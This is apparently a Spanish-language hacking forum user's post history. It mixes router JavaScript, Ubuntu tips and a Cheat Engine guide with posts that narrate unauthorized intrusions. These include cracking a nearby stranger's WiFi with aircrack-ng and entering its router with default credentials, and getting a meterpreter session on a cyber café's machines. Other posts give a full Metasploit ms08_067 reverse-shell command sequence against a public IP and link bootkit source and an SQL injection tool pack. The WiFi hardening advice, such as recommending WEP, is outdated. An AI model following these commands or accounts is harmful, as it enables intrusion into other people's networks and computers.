                    settingsSubscriber.setLocale(CA.CP.Language.getLanguage(), {});
                }
                submit();
            }
        }

        if (deviceId()) {
            withManagementGroups(session.subscriberId, false, function(managementGroups) {
                var mg = $A(managementGroups).find(function(mg) {
                    var device = deviceId().split(":");
                    var oui = device[0];
                    var sn = device[1];
                    return oui.toUpperCase() == mg.managedDevice.oui.toUpperCase()
                            && sn.toUpperCase() == mg.managedDevice.serialNumber.toUpperCase();
                });
                if (mg) {
                    setDeviceAndSubmit(mg.managedDevice.id, mg.id);
                } else {
                    /* FIX THIS WITH MANAGEMENT GROUP */
                    new CA.CP.Gateway("ouisn:" + deviceId()).getDevice({
                        success: function(device) {
                            if (device.subscriberId) {
                                if (device.subscriberId != session.subscriberId) {
                                    showDeviceBelongsToAnotherSubscriber();
                                } else {
                                    setDeviceAndSubmit(device.id);
                                }
                            } else {
                                withManagementGroups(session.subscriberId, true, function(allManagementGroups) {
                                    // need to assign this device to a SMG for this subscriber
                                    // first see if there is a SMG with a CP Provisioning ID available
                                    var cpProvisioningManagementGroup = $A(allManagementGroups).reject(function(mg) {
                                        return Object.isUndefined(mg.deviceSignature) || Object.isUndefined(mg.deviceSignature.cpProvisioningId);
                                    }).sortBy(function(mg) {
                                        return Number(mg.deviceSignature.cpProvisioningId);
                                    }).first();
                                    if (!Object.isUndefined(cpProvisioningManagementGroup)) {
                                        // found a SMG with a CP Provisioning ID
                                        // so, convert it to a management group for this managed device
                                        new CA.CP.SubscriberManagementGroup(session.subscriberId, cpProvisioningManagementGroup.id).post({
                                            success: function() {
                                                setDeviceAndSubmit(device.id);
                                            },
                                            error: function(xhr) {
                                                showGeneralError(xhr.status, CA.CP.getResource("Password.withManagementGroupsConvertError.label"));
                                            },
                                            data: Object.toJSON({managedDevice: {id: device.id}})
                                        });
                                    } else {
                                        // did not find a SMG with a CP Provisioning ID
                                        // so, create a new management group for this managed device
                                        new CA.CP.SubscriberManagementGroups(session.subscriberId).put({
                                            success: function () {
                                                setDeviceAndSubmit(device.id);
                                            },
                                            error: function (xhr) {
                                                showGeneralError(xhr.status, CA.CP.getResource("Password.withManagementGroupsCreateError.label"));
                                            },
                                            data: Object.toJSON({managedDevice: {id: device.id}})
                                        });
                                    }
                                });
                            }
                        },
                        on404:showInvalidDevice,
                        on403:showDeviceBelongsToAnotherSubscriber,
                        error:showGeneralError
                    });
                }
            });
        } else if (CA.CP.Cookies.deviceId() && CA.CP.Cookies.managementGroupId()) {
            setDeviceAndSubmit(CA.CP.Cookies.deviceId(), CA.CP.Cookies.managementGroupId());
        } else {
            withManagementGroups(session.subscriberId, false, function(managementGroups) {
                switch (managementGroups.length) {
                    case 0:
                        showSubscriberHasNoDevices();
                        break;
                    case 1:
                        setDeviceAndSubmit(managementGroups[0].managedDevice.id, managementGroups[0].id);
                        break;
                    default:
                        var devices = loginProblems.find(".devices").empty();
                        managementGroups.each(function(managementGroup) {
                            var md = managementGroup.managedDevice;
                            var text = md.friendlyName + ": " + md.serialNumber;
                            var value = md.oui + ":" + md.serialNumber;
                            var option = $j("<option>").val(value).text(text);
                            devices.append(option);
                        });
                        loginForm.find("#submitButton, #problemlink").addClass("inactive");
                        $j(".authFields", loginForm).find("INPUT").attr("disabled", "disabled");
                        loginProblems.find(".devicesRow").show();
                }
            });
        }
    }

    function hasValue(s) {
        return s != null && s.length > 0;
    }

    function okToContinue() {
        return (!passwordChangeRequired)
                && hasValue(CA.CP.Cookies.sessionId())
                && hasValue(CA.CP.Cookies.subscriberId())
                && hasValue(CA.CP.Cookies.deviceId())
                && hasValue(CA.CP.Cookies.managementGroupId());
    }

    new CA.CP.Branding("Global.UserInterface.ISPHelpDesk").getText({
        success: function(ispPhoneSupport) {
            $j(".ispPhoneSupport").text(ispPhoneSupport);
            $j(".onHaveIspPhoneSupport").removeClass("invisible");
        }
    });

    function isDeviceWithoutSubscriber() {
        if (!queryParameters.device) return false;
        if (queryParameters.subscriber) return false;
        return true;
    }

    if (isDeviceWithoutSubscriber()) {
        new CA.CP.Branding("Global.UserInterface.ISPWithoutSubscriberLoginExplanation").getText({
            success: function(ispExplanation) {
                $j(".ispWithoutSubscriber #explanation").html(ispExplanation);
                $j(".ispWithoutSubscriber").removeClass("invisible");
                $j("#loginBackground").hide();
                $j("#problemlink").hide();
            }
        });
    }

});


P.D Este router es de mi propiedad, si alguno quiere pruebas les enviare fotos y manuales del mismo por mp.

Saludos por alla.
#23
Cuales son los rangos del warzone gente..? me refiero al orden de los mismos de acuerdo al nivel.

Saludos por alla
#24
Buenas gente..

Pues quisiera saber cual gestor grafico de descargas recomiendan para Ubuntu, he bajado unos cuantos y no funcione con todos los servers (generalmente solo admiten megaupload y rapidshare) he intentado manejarme con el wget que trae la distro pero no he conseguido nada, por ejemplo:

cloudswx@mobhell2:~/Descargas$ sudo wget http://fsdnd23.fileserve.com/file/3NzZ7ZF/KKB3w5Hao7Tgc1eOVYhM9X-DKIfM-vihR4So9Y48xQkjhl115ZPwPRPuuHJ922skyxQ4b3b4A5LOsp_yjXJESywIhxIomWLE78fsg7t9nFgazFU2ATM3LsNo_QK24ZDD/339151/Daniel%20el%20travieso%20DVD-RIP%20ESP.avi
[sudo] password for cloudswx:
--2011-08-27 20:01:31--  http://fsdnd23.fileserve.com/file/3NzZ7ZF/KKB3w5Hao7Tgc1eOVYhM9X-DKIfM-vihR4So9Y48xQkjhl115ZPwPRPuuHJ922skyxQ4b3b4A5LOsp_yjXJESywIhxIomWLE78fsg7t9nFgazFU2ATM3LsNo_QK24ZDD/339151/Daniel%20el%20travieso%20DVD-RIP%20ESP.avi
Resolviendo fsdnd23.fileserve.com... 108.61.8.69, 108.61.8.70, 108.61.8.77, ...
Conectando a fsdnd23.fileserve.com|108.61.8.69|:80... conectado.
Petición HTTP enviada, esperando respuesta... 302 Found
Ubicación: http://www.fileserve.com/landing-1702.html [siguiente]
--2011-08-27 20:01:31--  http://www.fileserve.com/landing-1702.html
Resolviendo www.fileserve.com... 209.222.23.221
Conectando a www.fileserve.com|209.222.23.221|:80... conectado.
Petición HTTP enviada, esperando respuesta... 416 Requested Range Not Satisfiable

    El archivo ya se ha obtenido por completo; no hay nada que hacer.


A lo que me descarga un fichero de 20mb cuando el fichero pesa 700mb.

Espero sus recomendaciones, gracias de antemano.
#25
Muy buenas noches gente...

Ultimamente he estado un poco retirado por asuntos de trabajo y demas pero eso no impedira que publique una solucion que encontre a un problema que me tenia de cabeza.. Se trata de activar el wireless en una hp Pavillon DV2000 las cuales por razones no muy claras al instalar ubuntu 10.10 se bloquea la interfaz wireless, es decir por mas que cambiemos el interruptor de posicion, la luz siempre se queda naranja advirtiendo su inactividad.

Lo primero que se necesita para poder desbloquear la interfaz es conseguir esa magnifica herramienta que se llama "rfkill" podemos conseguirla instalandola desde la terminal con el siguiente comando:

sudo apt-get intall rfkill

Solo existe un incoveniente y es que para instalarlo se necesita de una conexion a internet (lo cual es precisamente lo que queremos corregir), en este punto tenemos dos opciones: Podemos conectarnos a una red cableada usando ubuntu para realizar todo el proceso, o podemos usar el guindows con el wireless ya que en ese S.O funciona perfectamente y descargar el fichero desde la pagina oficial de rfkill, aca les dejo el link por si prefieren la segunda opcion:
http://wireless.kernel.org/download/rfkill/

Una vez instalada la aplicacion abrimos una terminal y ejecutamos:

rfkill list

Este comando sirve para que rfkill nos muestre un listado de las interfaces inhalambricas y sus respectivos estados (Bloqueado ó Desbloqueado), seria una pantalla parecida a esta:



Aqui veremos dos parrafos con respectivos numeros 0 y 1 seguidos de la descripcion que explica si estan bloqueados por software ó por hardware, el 0 representa la interfaz en si misma (es decir el mismo hardware) y el uno significa su parte logica (software-driver). El objetivo aqui es desbloquear todo de todo en todos los sentidos.

Nota: el número 0 y 1 dependerá de los dispositivos que tengan instalados. Este truco posiblemente sirva para otras laptops, así que esos valores pueden cambiar. Adecuénlo a lo que vean en rfkill list.

Primero nos aseguramos de que el switch del wifi este encendido (hacia la derecha) y luego escribimos lo siguiente en una terminal:
sudo rfkill unblock 0

y luego

sudo rfkill unblock 1

No creo que haya que explicar para que son estos comandos pero como sea lo hare. Aqui le decimos que desbloquee todo lo que este bloqueado (que explicacion mas complicada ha? jejej). Luego de ejecutar esas dos lineas veremos una pantallita como esta:


Tan pronto terminemos de darle a enter nuestra luz empezara a parpadear y problema resuelto.

Ojala todos se alegren con esa luz parpadeando tal y como me paso a mi.

Saludos por alla.

Las imagenes son cortesia de Rho Noe.
#26
Pues ultimamente habia estado sufriendo al no poder ver videos online en fullscreen mode, hasta que buscando y buscando me encontre esta solucion en la web. La aplique y me funcione al 100%.

Aqui se las dejo para los que sufran del mismo mal:
sudo mkdir /etc/adobe
sudo su
sudo echo \"OverrideGPUValidation = 1\" >> /etc/adobe/mms.cfg


Luego reinician su navegador (Mozilla, Chrome, Chromium) y listo..

El problema tiene algo que ver con la aceleracion grafica en las tarjetas de Intel.

Espero les funcione, saludos.
#27
Hacking / Manual Basico Cheat Engine.
15 Junio 2011, 18:51 PM
Weno..

Aqui un breve paper sobre el uso de Cheat engine,


Este es un manual muy detallado y de mi autoria de como usar cheat engine,  Aqui les dejo el paper.

Manual basico Cheat engine por CloudswX.

QUE ES CHEAT ENGINE?

Cheat Engine es una herramienta de código abierto diseñado para ayudar con en la modificación de los juegos que se ejecutan sobre Windows, también contiene otras herramientas útiles para ayudar a la depuración de los juegos e incluso las aplicaciones normales.

Viene con un escáner de memoria para explorar rápidamente las variables utilizadas en un juego y permitir cambiarlas, también viene con un depurador, desensamblador, ensamblador, Speedhack, máquina de entrenamiento, herramientas de manipulación directa en 3D, herramientas de inspeccion del sistema.

Es decir, el Cheat Engine es un desensamblador en "tiempo real". Permite acceder a la memoria ocupada por CUALQUIER proceso y modificarla, no solo la de los juegos.

En este paper nos centraremo en la funcion de : Escanear la memoria RAM reservada por un juego y modificarla posteriormente

Muchos de las trampas que encuentras para juegos tan complejos como World Of Warcraft, Dragon Age I y II son hechas con el CheatEngine.



INSTALACION

Obviamente nos bajamos (6.2 MB) el Cheat Engine desde aqui:

http://cheatengine.org/download/CheatEngine61.exe

Pero no solo podemos bajarlo, tenemos la opcion de bajar el codigo fuente por si acaso alguien quiere hacerle unos arreglitos.

Hay que saber que CE no es un virus, ni un spyware, ni nada por el estilo pero al ser un hacking tool los antivirus pueden jodernos la instalacion, por lo que yo recomiendo que desactiven sus antivirus antes de proceder a la instalacion.

No explicare paso a paso la instalacion porque ufffff todos los usuarios de guindows saben eso (doble click, acepto, instalacion tipica, siguiente, siguiente, instalar, etc...) Despues de instalado nos saltara un muy buen manual de como usarlo pero esta en ingles.

USANDO CHEAT ENGINE

Aqui viene la parte interesante del asunto, despues de instalado damos un doble click sobre el icono de nuestro escritorio,  icono que seria muy parecido a este:



Lo cual nos abrira una interfaz grafica con todas las opciones que podremos usar de este maravilloso programa, como dije anteriormente solo me enfocare en el escaneo de memoria para modificar una variable prederminada. Explico a continuacion para que sirve cada boton:


Debido a que estoy haciendo este paper desde mi portatil que solo tiene ubuntu se habran dado cuenta que tengo XP corriendo desde una maquina virtual y es desde hare todo, por tanto esta vez tomaremos como juego de muestra el famoso Pinball de guindows y lo modificaremos para tener una puntuacion altamente ridicula.

Primero abrimos el CE (Abreviaturas de Cheat Engine, para no escribirlo siempre ufff)... dando doble click sobre el icono del escritorio.

Posteriormente buscamos y abrimos normalmente nuestro pinball de guindows, OJO aun no debemos jugar. Una vez tenemos ambos abiertos damos click en el selector de procesos (el que esta señalado con una flechita roja) y seleccionamos el proceso del pinball, se veria algo como esto:



Una vez seleccionado el proceso la pantalla nos quedaria asi:



A continuacion modificaremos el valor de los puntos (Score), pero como saber cual variable modificar? :huh: como nos damos cuenta cual es? Sencillo, como aun no hemos jugado nada nuestro puntaje esta en cero por lo que en la casilla de escanear escribiremos el numero cero 0, y activamos el filtro de buscar valor exacto, para finalmente dar a "first scan", tendriamos algo como esto:



Ustedes diran ufff... 442,342 resultados para este valor en la memoria asignada al proceso pinball.exe, chanfleee... Pues nunca dije que fuera facil asi que paciensia chicos. Ahora jugamos un poco para conseguir algunos puntos..

Bueno mas que conseguir algunos puntos me quede un rato jugandolo.. jejej (es entretenido la verdad...) Ahora que tenemos un nuevo Score buscamos ese valor en CE y tendremos una pantalla como esta:



Ya con un nuevo valor buscamos la direccion de memoria y solo nos saldra una..



La cual modificaremos dandole un doble click a la direccion que nos aparecera y posteriormente un click derecho, asi:



Aquí modificamos el valor...



y listo...  pinball se actualizara tras un rato de que sigamos jugando(no seguí poniendo imágenes porque me llego la hora de irme a trabajar).

P.D Recuerden pausar el juego mientras modificamos la variable en la memoria asignada, recuerden que debemos ser usuarios Administradores para modificar segmentos de memoria.

Saludos.







#28
Wenas..

Pues mi duda es sencilla, para escribir un exploit es necesario tener el código fuente del programa o del servicio que queremos explotar?

Mis disculpas anticipadas si ofendo con mi ignorancia.
#29
Buenas.

Mi duda es la siguiente, la mayoria de los router suelen traer por defecto un pass y un usuario default, que suelen ser los famosos admin--admin, admin--1234, admin--root, etc.. Pues sucede que me he encontrado un router clear acces al que pretendo ingresar por su interfaz web para testear un poco. Pero el user y el pass es su numero unico de serial que esta escrito debajo del mismo. Cierta vez y en otro caso que no era este consegui ese tipo de informacion por ingenieria social y estoy casi seguro de que podria conseguirla nuevamente, pero me he puesto a pensar que quizas en el codigo fuente de la interfaz web del router (el cual esta escrito en sencillo html y javascript) exista algun tipo de informacion ó rutina de javascript que pueda ser interpretada para saber la misma. (Algo asi como en el warzone de este foro).

Es decir, el formulario web en su codigo debe tener en algun sitio el numero de serial para compararlo con la entrada del textbox y dar acceso o negarlo de acuerdo a lo introducido.

Espero este bien planteada esta duda.

Saludos y gracias de antemano.
#30
Se sabe que las redes WiFi son vulnerable dependiendo de que cifrado uses, por ejemplo si usas una cifrado WPE, estas haciendolo mal porque es, teóricamente fácil de crackear. No es ningún misterio, buscando en internet te encuentras muchos manuales, solo que la gran mayoría son complicados para la mayoría de los usuarios.

Ahora unos investigadores japoneses han logrado crear un crack para romper la seguridad de redes que tienen contraseña WPA en, atención, menos de un minuto.

Aca el PDF para que los interesados puedan leerlo. (esta en ingles).
http://jwis2009.nsysu.edu.tw/location/paper/A%20Practical%20Message%20Falsification%20Attack%20on%20WPA.pdf
#31
Buenas..

Pues el asunto es el siguiente: Leyendo, practicando, pensando y leyendo nuevamente he logrado lo siguiente:

Con ayuda de Aircrack-ng aprendi a auditar la seguridad wifi de mi hermana que vive cerca de mi, gracias a tantos manuales que hay en la red solo fue cuestion de practica y tiempo. Posteriormente me puse a testear un AP que esta instalado en las cercanias de la empresa donde laboro, sucede que entre capturas de paquetes, clonado de MACs, DoS a estaciones asociadas y demas truquillos consegui el passphrase de ese AP domestico y aqui es donde viene mi sopresa y mi decepcion en cuanto a lo despreocupados que son los tecnicos de las ISP y la corta informacion de la que disponen los usuarios comunes.

Una vez con el passphrase del router wireless simplemente busque la direccion IP del gateway, la escribi en la barra url de mi mozilla, le di a enter y voila !!!!!



El login screen de la configuracion, ni siquiera me invito a un segundo intento, simplemente me abrio las puertas al primer "admin" "admin" dejandome redirigir puertos, facilitandome las cosas para un MITM. Sin mencionar que puede ver los equipos conectados a esa red domestica (cajas digitales para telecable, XBOX, y un curioso modulo para Voip. El asunto es el siguiente, a las ISP les importa poca cosa la seguridad de tu servicio Wi-Fi, despues que hayas firmado el contrato de pagarles sus facturas mensualmente eres el total responsable de tu seguridad. Por ello a todos mis conocidos y los no conocidos (incluyendo el dueño de este AP) les exhorto a tomar medidas para evitar este tipo de intrusiones, medidas como por ejemplo:

Paso 1, debemos activar el WEP. Parece obvio, pero no lo es, muchas redes inalámbricas, bien por
desconocimiento de los encargados o por haraganeria de los mismos no tienen el WEP activado. WEP no es completamente seguro, pero es mejor que nada. Mejor aun seria activar el WPA, el WPA es mas seguro que el WEP. Si no tienen idea de como activar el WAP y sabiendo que la explicacion depende mucho del modelo de router que posean les recomiendo que se den una vuelta por aqui:
http://www.adslayuda.com/

- Paso 2, debemos seleccionar una clave de cifrado para el WPA lo suficientemente difícil como para que nadie sea capaz de adivinarla (realmente este no seria el termino correcto, porque nadie la adivina, lo que hacemos es desencriptarla). No debemos usar fechas de cumpleaños ni números de teléfono, o bien hacerlo
cambiando (por ejemplo) los ceros por oes.

- Paso 3, desactivar el DHCP y activar el ACL. Debemos asignar las direcciones IP manualmente y sólo a las direcciones MAC conocidas. De esta forma no permitiremos que se incluyan nuevos dispositivos a nuestra red. En cualquier caso existen técnicas de sniffing de las direcciones MAC que podrían permitir a alguien el descubrir direcciones MAC válidas si estuviese el suficiente tiempo escuchando las transmisiones.  ;)

- Paso 4, Cambiar el SSID y modificar su intervalo de difusión. Cada casa comercial preconfigura el intervalo de difusion en sus dispositivos, por ello es muy fácil descubrirlos. El intervalo de difusion es la frecuencia con las que se envian los "Beacons" al aire, los "Beacons" son pulsos de señales que envia el router diciendo "Hey estoy aqui..." para que cualquier dispositivo pueda vincularse a este.  Es como si alguien lanzara una luz de bengala al aire cada 2 horas para poder ser visto y rescatado. si en vez de esto lanzara la bengala cada 10 horas entonces estaria DISMINUYENDO su intervalo de difucion, lo que le haria mas dificil ser encontrado.   ;)

Siguiendo estos sencillos pasos estariamos aumentando la seguridad de nuestras redes inalambricas, pero aun seria vulnerable ya que gracias a herramientas como la suite Aircrack-ng aunque adoptemos estas medidas nunca estaremos del todo a salvo.

#32
Buenas...
Espero ser lo mas claro posible en cuanto a mi pregunta y de antemano agradezco cualquier ayuda o respuesta que me hagan.

El asunto que es que he estado leyendo mucho sobre javascript (manuales, codigo, ejemplos..) y tengo una duda que no he podido aclarar, he leido que en muchas ocasiones es necesario extraer una porción o substring de un string dado. En estos casos es posible usar una función miembro de la clase String denominada substring.

Me he dado cuenta de que para extraer un substring desde una posición determinada hasta el final del string el codigo seria:
String str="Un hermoso dia";
String subStr=str.substring(11);


Asi consiguiriamos el substring "dia".

Tambien podriamos indicar la posicion inicial y la posicion final de donde extraeriamos el substring, por ejemplo:
String str="Un hermoso dia";
String subStr=str.substring(3, 10);


Aqui conseguiriamos el substring "hermoso".

Hasta ahi todo esta claro, la duda es la siguiente:
Que pasaria si escribimos el codigo especificando primero la posicion final y luego la posicion inicial, algo como esto:
String str="Un hermoso dia";
String subStr=str.substring(10, 3);


¿QUE SUBSTRING OBTENDRIAMOS?

Gracias de antemano...
#33


Como ya sabran ha sido liberada la ultima version de mozilla, la cual viene una gran cantidad de mejoras y una nueva interfaz muy parecida segun algunos al Opera, con tiempos de inicio más rápidos, aceleración de gráficos renderizados y mejoras en la velocidad de carga de las páginas, Firefox 4 está lleno de grandes mejoras en el rendimiento que notarás instantáneamente. Desde Compartimentos integrado y un manejo más eficiente de objetos javascript que permiten el uso de ECMAScript5 y basados en el nuevo motor de javascript JägerMonkey, aqui dejo segun mi entender la forma mas sencilla de instalarlo:

Primero abrimos un terminal:
cloudswx@cloudswx-TravelMate-4200:~$

Luego en la carpeta personal creamos un directorio que se llame "apps"
cloudswx@cloudswx-TravelMate-4200:~$ mkdir apps/
Despues de esto nos bajamos los archivos desde el servidor FTP de mozilla..
cloudswx@cloudswx-TravelMate-4200:~$ wget ftp://mozilla.fastbull.org/mozilla/firefox/releases/4.0/linux-i686/es-ES/firefox-4.0.tar.bz2

Nota, si queremos la version de 64 bits entonces cambiamos la ultima linea por esta otra:
cloudswx@cloudswx-TravelMate-4200:~$  wget ftp://mozilla.fastbull.org/mozilla/firefox/releases/4.0/linux-x86_64/es-ES/firefox-4.0.tar.bz2

Luego de bajar todos los archivos desde el servidor FTP los descomprimimos y compilamos con la siguiente linea:
cloudswx@cloudswx-TravelMate-4200:~$  bzip2 -dc firefox-4.0.tar.bz2 | tar -xv
Buenos hasta aqui ya tenemos nuestro mozilla descargado, descomprimido y compilado, ahora procederemos a editar el archivo firefox4.desktop para el correcto inicio del mismo
cloudswx@cloudswx-TravelMate-4200:~$ sudo gedit /usr/share/applications/firefox4.desktop
Entonces se abrira un archivo en blanco en el que agregaremos las siguientes lineas:
Citar[Desktop Entry]
Name=Firefox 4
Exec=/home/usuario/apps/firefox/firefox %u
Terminal=false
X-MultipleArgs=false
Type=Application
Icon=firefox
Categories=Application;Internet;Network;WebBrowser;
MimeType=text/html;text/xml;application/xhtml+xml;application/xml;application/vnd.mozilla.xul+xml;application/rss+xml;application/rdf+xml;image/gif;image/jpeg;image/png;
StartupWMClass=Firefox
StartupNotify=true

Simplemente cambiamos la palabra usuario por el nombre de usuario que tenemos en nuestro sistema, realizado estos pasos guardamos y cerramos. Luego reiniciamos firefox y a disfrutar...
Saludos
#34
Pues como siempre hago despues de buscar y buscar por toda la red acudo a este maravillosos templo de saber tratando de recibir alguna ayuda.

Sucede que tengo una tarjeta wireless con estas características:

CHIPSET      FABRICANTE       NOMBRE
ipw3945               Intel                 Intel® PRO/Wireless 3945ABG

La cual segun una lista conseguida en la web es compatible para inyectccion de paquetes desde linux..
Aca esta la lista si quieren verificar:

http://hwagm.elhacker.net/htm/tarjetas.htm

Tengo que decirles que mi tarjeta funciona muy bien para la conexion de wifi, navegar por internet, todo...
Pero resulta que quiero usar el aircrack-ng, airodump-ng, etc... Y necesito ponerla en modo monitor pero cuando intento  hacerlo me pasa lo siguiente:

cloudswx@cloudswx-TravelMate-4200:~$ iwconfig wlan0 mode monitor
Error for wireless request "Set Mode" (8B06) :
   SET failed on device wlan0 ; Operation not permitted.
cloudswx@cloudswx-TravelMate-4200:~$


Pienso que quizas sea que los driver no permiten ponerla en modo Monitor, si alguien me hecha una mano se lo agradezco.
Informacion:
Acer Travelmate 4200
Procesador Intel Centrino Core Duo 1.66
1 GB de RAM
Ubuntu 10.10

cloudswx@cloudswx-TravelMate-4200:~$ iwconfig
lo        no wireless extensions.

wlan0     IEEE 802.11abg  ESSID:off/any  
         Mode:Managed  Access Point: Not-Associated   Tx-Power=15 dBm  
         Retry  long limit:7   RTS thr:off   Fragment thr:off
         Power Management:off
         
eth0      no wireless extensions.
#35
GNU/Linux / Metasploit no me arranca
20 Marzo 2011, 17:35 PM


Aqui nuevamente tocando a las puertas del templo..
Sucede que me he instaldo el metasploit en mi ubuntu 10.10 todo normal sin problemas ninguno, pero cuando intento lanzarlo me lanza el siguiente error:



que puede ser?
sera que me falta alguna libreria para ejecutarlo correctamente??

#36
Tengo cierta experiencia en programacion sobre el lenguaje VB, y recien instale el hermoso y magnifico Ubuntu 10.10 inmediatamente me puse a buscar algun lenguaje similar y me encontre con Gambas, en fin solo quiero compartir un manual que encontre en la web del programador y que me parece muy bien explicado.

http://www.lawebdelprogramador.com/cursos/down.php?id=3452

Ojala le sirva de algo a alguien...

#37
GNU/Linux / Ayuda para instalar IconquerU
16 Marzo 2011, 19:38 PM

Pues como sabran soy un ex militante de windows, que ahora esta enamorado de Ubuntu,y a pesar de que me estoy recien acostumbrando a moverme por este nuevo entorno aun se me hace muy dificil el asunto de la instalaciones de aplicaciones. Ya manejo con facilidad lo del centro de software de ubuntu, el gestor de paquetes synaptics, y las instalaciones desde el terminal...
cloudswx@cloudswx-TravelMate-4200:~$ sudo apt-get install mono-mjs


Mi atasco comienza cuando descargo una aplicación desde mozilla, ya que en la mayoria de los casos viene en formato " tar.gz " he tratado instalarlo desde la terminal, pero solo llego hasta aqui..
cloudswx@cloudswx-TravelMate-4200:~/IConquerU$

No se que archivo ejecutar ni donde buscarlo...    :huh:
#38
GNU/Linux / Compatibilidad de archivos.
7 Marzo 2011, 18:42 PM
Soy un viejo y cansado usuario de windows, chupando de microsoft desde su DOS, resulta que los ultimos años he leido bastante sobre GNU-Linux, sus diferentes distros (sabores), la filosofia del codigo open souce y todo eso...

He probado por mas de dos meses el ubuntu desktop edition LiveCd, y me ha sido amor a primera vista.... ya se que es posible instalar guindouss y Linux simultaniamente en diferentes particiones. Pero podria usar mis archivos de la particion guindows en linux? (mp3s, docs, pics, etc..) he leido algo sobre instalr el protocolo SMB, pero como y donde tendria que ejcutar la instalacion?

Gracias de antemano...
#39
Antes que nada un inmenso saludo a las maravillosas menten que conforman este templo del saber, tambien decirles de antemano que antes de postear esta duda he recorrido todo google en busca de una respuesta y no he dado con la misma, asi que aqui les va.

Tengo un nokia C3 corriendo con el symbian 40 (S40) recien adquirido con la compañia Orange Dominicana, el equipo tiene conectividad WI-FI, y hasta este punto todo es color de rosa, puedo usar msn y Opera Mini 5.1 con toda libertad siempre que este conectado a una WLAN, el problema viene cuando intento ver videos desde youtube o descargar alguna aplicacion gratuita desde la tienda oficial de nokia OVI STORE, ya que me cierra el browser de Opera e intenta conectarse por el navegador preinstalado en el equipo, el cual solo se conecta por la red GPRS de la compañia Orange, tragandose asi todo mi saldo. La pregunta es: ¿Existe alguna forma de hacer que el acceso para los paquetes de datos pueda ser via WI-FI? Y no por la red de Orange.

Gracias de antemano.
#40
Seguridad / falla irreparable en Windows 7
23 Abril 2010, 03:08 AM
Durante una convención de hackers llevada a cabo en Dubai, investigadores de este campo demostraron como explotar una falla irreparable en Windows 7. Según parece estos señores han encontrado una manera tomar el control de una computadora Windows 7 durante el proceso de booteo usando un pequeño programa llamado VBootkit 2.0. Como no se altera información del disco duro es muy difícil detectar esta aplicación y obviamente aun mas difícil eliminarla.


Una vez que se carga el pequeño programa el atacante podría cambiar contraseñas, acceder a archivos protegidos, o incluso correr código de manera remota para luego salir sin dejar rastro. Sin embargo, a diferencia de muchos programas malintencionados que existen, VBootkit 2.0 no puede ser instalado de manera remota lo cual significa que el atacante necesariamente tiene que tener acceso físico a la computadora para ponerla en riesgo. Además al reiniciar la computadora se elimina cualquier brecha de seguridad ya que la memoria del sistema es borrada en el proceso.

Por estas razones y el hecho que no se puede esparcir por la red, es muy debatible la severidad de esta falla. Sin embargo, puede ser de gran preocupación para las empresas y personas que utilizan computadoras en espacios públicos. Microsoft aun no ha comentado sobre la vulnerabilidad pero las personas que la descubrieron sostienen que existe gracias al hecho que Windows 7 asume que el proceso de booteo es inmune a los ataques. Según ellos es un problema de diseño que no puede ser solucionado.

Aca el codigo fuente para los que quieran darle un ojo:
http://www.nvlabs.in/uploads/projects/vbootkit2/vbootkit2.zip

xaooo
#41
Hacking / Ayuda con MSF
13 Febrero 2010, 23:45 PM
Duda Metasploit.

Ok gente sere breve en mi duda:

Escaneo una IP con el Nmap....

PORT    STATE SERVICE      VERSION

139/tcp open  netbios-ssn

445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds


Tiene el puerto 445 abierto (vulnerabilidad en el SMB), luego abro mi consola de MSF y....
Citarmsf> use windows/smb/ms08_067_netapi

Luego de esto elijo el PAYLOAD:
msf> use PAYLOAD windows/meterpreter/reverse_tcp

Introduzco todas las variables con el comando "set"...
set RHOST 200.xx.xx.xx
set LHOST 192.168.x.xx
set RPORT 445
set LPORT 4444
set TARGET 0


y finalmente
msf> exploit

El asunto esta en que consigo mi sesion con el meterpreter sin problema alguno, pero cuando salgo de la consola del meterpreter y posteriormente del MSF, no puedo volver a conectar con el host pues da el siguiente error:

http://picasaweb.google.com/lh/photo/i0Ya_l659UiyRlKj92MIAA?feat=directlink

Sera porque el host se queda con la sesion anterior del Meterpreter?
Y si es asi, como consigo que no me siga pasando pues la cosa esta que solo consigo entrar a la pc victima una sola vez   :-\


Post data
estas pruebas las hago en mi casa pues tengo varias pc´s que uso como conejillos de india.


#42
Hacking / Seguridad por las ISP?
9 Febrero 2010, 23:05 PM
Wenas..........

Sere breve en mi pregunta, El asunto es que quisiera saber si las ISP juegan algun papel en la seguridad de sus usuarios.

Mi duda viene al caso de cuando escaneo (con Nmap) un objetivo estando yo dentro de una red LAN (fisicamente dentro) puedo ver una cantidad de puertos abiertos y servicios corriendo, pero cuando lo hago desde fuera obtengo resultados diferentes y menos alentadores (menos puertos abiertos, menos servicios corriendo, menos vulnerabilidades). 

El escenario en concreto es un cyber, es decir estando dentro del cyber escaneo, busco informacion, comprendo la topologia de la red, modelos de aparatos y toda la informacion que puedo conseguir, entonces estando en mi casa trato de auditar esa seguridad (bonita palabra "auditar"), consigo explotar ciertas vulnerabilidades y logro abrir una sesion con el meterpreter de MSF, pero vaya que es mas dificil.

¿LAS ISP JUEGAN ALGUN PAPEL EN LA SEGURIDAD DE SUS USUARIOS?

Gracias de antemano....
#43
Nivel Web / SQL Injections Tools
4 Octubre 2009, 03:05 AM
Buenas noches a todos, gente buena que forma este increible foro.

Navegando por la WEB encontre todo un arsenal de herramientas para inyectar todos los sitios web que sufran esta vulnerabilidad con una letal dosis de SQL  (Es broma solo queria sonar un poco malvado  :P ).

Espero les guste mi aporte.

Saludos a todos.



http://rapidshare.com/files/202049053/SQL_AIO.zip

Aca esta el Pass: http://www.level-23.com/foro